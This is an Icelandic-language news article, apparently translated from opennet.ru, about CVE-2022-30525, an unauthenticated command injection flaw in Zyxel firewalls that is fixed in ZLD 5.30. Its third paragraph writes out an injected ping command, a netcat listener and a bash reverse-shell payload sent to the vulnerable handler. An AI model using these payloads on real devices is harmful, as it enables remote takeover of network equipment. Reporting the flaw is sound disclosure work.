Veikleiki í Zyxel eldveggjum sem leyfir keyrslu kóða án auðkenningar

Mikilvægur varnarleysi (CVE-2022-30525) hefur fundist í Zyxel tækjum af ATP, VPN og USG FLEX seríunni, sem eru hönnuð til að skipuleggja rekstur eldvegga, IDS og VPN í fyrirtækjum, sem gerir utanaðkomandi árásarmanni kleift að keyra kóða á tæki án notendaréttinda án auðkenningar. Til að framkvæma árás verður árásarmaður að geta sent beiðnir til tækisins með því að nota HTTP/HTTPS samskiptareglur. Zyxel hefur lagað varnarleysið í ZLD 5.30 vélbúnaðaruppfærslunni. Samkvæmt Shodan þjónustunni eru sem stendur 16213 hugsanlega viðkvæm tæki á heimsnetinu sem samþykkja beiðnir í gegnum HTTP/HTTPS.

Aðgerðin fer fram með því að senda sérhannaðar skipanir til vefstjórans /ztp/cgi-bin/handler, aðgengilegar án auðkenningar. Vandamálið stafar af skorti á réttri hreinsun á færibreytum beiðni þegar skipanir eru framkvæmdar á kerfinu með því að nota os.system kallið sem notað er í lib_wan_settings.py bókasafninu og framkvæmt þegar unnið er með setWanPortSt aðgerðina.

Til dæmis gæti árásarmaður farið framhjá strengnum “; ping 192.168.1.210;" sem mun leiða til framkvæmdar á "ping 192.168.1.210" skipuninni á kerfinu. Til að fá aðgang að skipanaskelinni geturðu keyrt „nc -lvnp 1270“ á vélinni þinni og síðan hafið öfuga tengingu með því að senda beiðni til tækisins með „; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;’.

Heimild: opennet.ru

Bæta við athugasemd